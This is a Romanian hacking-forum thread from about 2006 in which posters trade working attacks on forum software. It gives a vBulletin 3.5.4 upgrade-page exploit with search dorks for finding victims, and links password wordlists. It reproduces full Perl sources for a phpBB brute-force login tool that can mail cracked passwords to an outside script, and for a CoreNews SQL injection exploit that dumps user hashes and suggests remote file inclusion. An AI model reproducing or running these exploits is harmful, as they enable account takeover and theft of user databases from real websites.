Screech

<div class='quotetop'>QUOTE("86ac7f0d41884bf3119acede4ec84756bb")</div> cool, m-am uitat si eu acum, dar se vede ca omu le are

ar fi tare frumos daca-i pune si un site pe host

Alex, citeste mai cu atentie ce am zis mai sus deci va functiona numai daca nu este securizat, in cazul tau este, iti trebuie parola, dar sunt ceva forumuri la care merge

mda, l-am gasit si eu mai demult, l-am si incercat acum cateva zile dar nu mi-a mers ----------------------- fuck, u are not a romanian boy , i say this: i`ve try this exploit but no work for me

vBulletin 3.5.4 exploit [Daca patch-ul install este deschis sau nesecurizat] Exploit: install/upgrade_301.php?step=df Cauta: Powered by vBulletin 3.5.4 ori Powered by vBulletin Exemplu: www.numesite.ro/forumpatch/install/upgrade_301.php?step=df Dupa ce intrati in pagina de upgrade. faceti download la user ptr. a lua baza de date, o sa gasiti cateva forumuri chiar interesante si cu ceva useri Imagini: Exploitul merge aproape la orice versiune

alex, pai si atunci ce cauti pe un forum de hack?

Ce nu gasesti este ascuns Cauta asa: Powered by phpBB

<div class='quotetop'>QUOTE("Pytbullu")</div> Ce conteaza parerea celorlanti? Daca ptr. el e bine sa stea mult la pc este OK, prieteni care-i zic asa ceva, habar nu au ce zic Bun venit edyshmen

Nu cred asta pana nu vad , daca e asa ai o bila alba de la Xavier

<div class='quotetop'>QUOTE("djatto")</div> De ce nu au unii durere de cap? Ca prostia nu doare. Ei nu se referea ca le-au "sarit antivirusurile in sus" din cauza ca "s-au facut cu un troina" ci la faptul ca este detectabil.

<div class='quotetop'>QUOTE("Thunder")</div> La mine da roade. Poti incerca listele pe care le folosesc si eu daca doresti, le pun acum si vi le dau http://rapidshare.de/files/25015632/dictio...xavier.rar.html eu si acum am brutus deschis si folosesc tot listele astea de parole

Downoad tut: http://rapidshare.de/files/25014477/phpbb_...eforce.rar.html Exploit: #!/usr/bin/perl #################################################################################################################### # Title: PhpBB <= 2.0.18 Remote Bruteforce/Dictionary Attack Tool # Type: Bruteforce / Dictionary attack # New demo: http://rapidshare.de/files/13694254/phpbbbtr.avi.html (1.06 mb) # Php Email Script data: <? mail($destinataire, $objet, $contenu, "From: $expediteurrnReply-To: $expediteur"); ?> # Note: Host the php script and replace the line 34 [] Php script for the email option because win32 don't support Mail::Mailer # Changelog: Bruteforce option | Starting length | Email option | More fast | Die error disabled | # Credits: Fully coded by DarkFig # Greetz: Romano [] Pgeo [] Fred [] CrackJerem [] Volcom [] Ddxs [] The truth [] And all man who like me =) #################################################################################################################### use IO::Socket; use LWP::Simple; #_Utilisation_ if(@ARGV < 6){ print q( +---------------------------------------------------------------------------------------------------+ | PhpBB <= 2.0.18 Remote Bruteforce/Dictionary Attack Tool [~_~] by DarkFig | +---------------------------------------------------------------------------------------------------+ | Usage: phpbbbtr.pl <host> <path> <port> <attack> <char> <length> <victim> <log> <email> | +---------------------------------------------------------------------------------------------------+ | <host> | The host where the php flaw is installed | [Ex: victim.com] | | <path> | Path of the php flaw | [Ex: /vuln/] | | <port> | Port of the host | [Ex: 80] | | <attack> | Bruteforce[-btr] or Dictionary[-dict] | [Ex: -dict] | | <char> | Bruteforce[upperalpha, loweralpha, numeric] or Dictionary file | [Ex: dico.txt] | | <length> | For the bruteforce option, define a starting length | [Ex: 7] | | <victim> | The victim's username | [Ex: L4m3r] | | <log> | [Optional] File where you want to save the password | [Ex: results.txt] | | <email> | [Optional] Email where the password will be sent | [Ex: haxor@gmail.com] | +---------------------------------------------------------------------------------------------------+ );exit;} #_Configuration_ $mailsite = "http://yoursite.com/mailme.php"; #Replace this value by the Url of the Php email script $shipper = "xploitdarkfigbot%40gmail.com"; #Default shipper email, xploidarkfigbot@gmail.com really exist => It work $host = $ARGV[0]; $path = $ARGV[1]; $port = $ARGV[2]; $attack = $ARGV[3]; $content = $ARGV[4]; if($attack eq "-btr"){$length = $ARGV[5];$username = $ARGV[6];$results = $ARGV[7];if(!$ARGV[9]){$mailoption = 0;} else {$mailoption = 1;$email = $ARGV[8];}} else {$username = $ARGV[5];$results = $ARGV[6];if(!$ARGV[7]){$mailoption = 0;} else {$mailoption = 1;$email = $ARGV[7];}} $nligne = "-1"; $postit = "$path"."login.php"; $full = "http://"."$host"."$path";&hello; #_Hello_ sub hello() { if($attack eq "-dict"){open dictionary, "<$content" || print " [-]Can't open the file.";chomp(@dico = <dictionary>);} print "n +--------------------------------------------------------+ PhpBB <= 2.0.18 Remote Bruteforce/Dictionary Attack Tool +--------------------------------------------------------+ [+] Attack: ";if($attack eq "-btr"){print "Bruteforce";}if($attack eq "-dict"){print "Dictionary";};print" [+] Target: $full [+] Port: $port [+] Username: $username +--------------------------------------------------------+"; if($content eq "upperalpha"){$nligne = "A";} if($content eq "loweralpha"){$nligne = "a";} if($content eq "numeric"){$nligne = "0";} if($attack eq "-dict"){&dictio;}if($attack eq "-btr"){&generate;}} #_Bruteforce_ sub generate() { $nligne x= $length; $passwordz = $nligne; print "n [~]Trying the password: $passwordz"; &phpbb;} sub btrfr() { $nligne++; $passwordz = $nligne; print "n [~]Trying the password: $passwordz"; &phpbb;} #_Dictionary_ sub dictio() { $nligne++; $passwordz = $dico[$nligne]; if($passwordz eq ""){&successfailed;} print "n [~]Trying the password: $passwordz"; &phpbb;} #_Socket_ sub phpbb(){ while ($OK ne 1){ $data = "username="."$username"."&password="."$passwordz"."&redirect=&login=Connexion"; $length = length $data; my $send = IO::Socket::INET->new(Proto => "tcp",PeerAddr => "$host", PeerPort => "$port") || print "n [-]Can't connect to the host."; print $send "POST $postit HTTP/1.1 Host: $host Content-Type: application/x-www-form-urlencoded Content-Length: $length $data"; read $send, $answer, 15; close($send); if($answer =~ /HTTP/(.*?) 302/){$OK = 1;} &decision;}} #_Decision_ sub decision(){if($OK ne 1){if($attack eq "-dict"){&dictio;}if($attack eq "-btr"){&btrfr;}} else {&successfailed;}} #_Success/Failed_ sub successfailed(){ if($OK eq 1){print "n [+]User: $usernamen [+]Password: $passwordz";} if($OK eq 0){print "n [-]User: $usernamen [-]Password: Not found";} open FILE, ">$results" || print "n [-]Can't write the file."; print FILE " +--------------------------------------------------------+ PhpBB <= 2.0.18 Remote Bruteforce/Dictionary Attack Tool +--------------------------------------------------------+ [+] Target: $full [+] Port: $port [+] Username: $username [+] Password: "; if($OK eq 1){print FILE "$passwordz";} if($OK eq 0){print FILE "Not found...";$passwordz = "Not found";} print FILE "n+--------------------------------------------------------+n"; close FILE; close dictionary; #_EmailOption_ if($mailoption eq 1){ $fullmailurl = "$mailsite"."?expediteur="."$shipper"."&destinataire="."$email"."&objet="."[Xploit]Results for $host"."&contenu="."Target: $full"."%0D%0A"."Port: $port"."%0D%0A"."Username: $username"."%0D%0A"."Password: $passwordz"; $mailpg = get($fullmailurl) || print "n [-]Can't connect to the email script hoster.n+--------------------------------------------------------+nn" and exit; print "n [+]Email sent, check your mail !n+--------------------------------------------------------+nn";} else {print "n+--------------------------------------------------------+n";}exit;} # milw0rm.com [2006-02-20][/list:u] E posibil sa mearga si pe alte versiuni, acesta e ptr. 18, dar vad ca merge si pe 19, si doar pe asta am incercat eu

Norocul nu-l ai, ti-l faci.

Download tut: http://rapidshare.de/files/24936927/core_n..._2.0.1.rar.html Search: Powered by CoreNews 2.0.1 Exploit: #!/usr/bin/perl #Method found & Exploit scripted by nukedx #Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com #Original advisory: http://www.nukedx.com/?viewdoc=24 #Usage: corenews.pl <host> <path> use IO::Socket; if(@ARGV != 2) { usage(); } else { exploit(); } sub header() { print "n- NukedX Security Advisory Nr.2006-24rn"; print "- CoreNews <= 2.0.1 Remote SQL Injection Exploitrn"; } sub usage() { header(); print "- Usage: $0 <host> <path>rn"; print "- <host> -> Victim's host ex: http://www.victim.comrn"; print "- <path> -> Path to CoreNews ex: /corenews/rn"; exit(); } sub exploit () { #Our variables... $cnserver = $ARGV[0]; $cnserver =~ s/(http://)//eg; $cnhost = "http://".$cnserver; $cndir = $ARGV[1]; $cnport = "80"; $cntar = "preview.php?userid="; $cnxp = "-1/**/UNION/**/SELECT/**/null,concat(2022,login,20223,password,2203),null,null,null,null/**/FROM/**/corenews_users/*"; $cnreq = $cnhost.$cndir.$cntar.$cnxp; #Sending data... header(); print "- Trying to connect: $cnserverrn"; $cn = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$cnserver", PeerPort => "$cnport") || die "- Connection failed...n"; print $cn "GET $cnreq HTTP/1.1n"; print $cn "Accept: */*n"; print $cn "Referer: $cnhostn"; print $cn "Accept-Language: trn"; print $cn "User-Agent: NukeZillan"; print $cn "Cache-Control: no-cachen"; print $cn "Host: $cnservern"; print $cn "Connection: closenn"; print "- Connected...rn"; while ($answer = <$cn>) { if ($answer =~ /2022(.*?)20223([d,a-f]{32})2203/) { print "- Exploit succeed!rn"; print "- Username: $1rn"; print "- MD5 HASH of PASSWORD: $2rn"; print "- If you crack hash you can use RFI with example ->rn"; print "- Example: $cnhost$cndir?show=http://yourhost.com/file.txtrn"; exit(); } } #Exploit failed... print "- Exploit failedn" }[/list:u]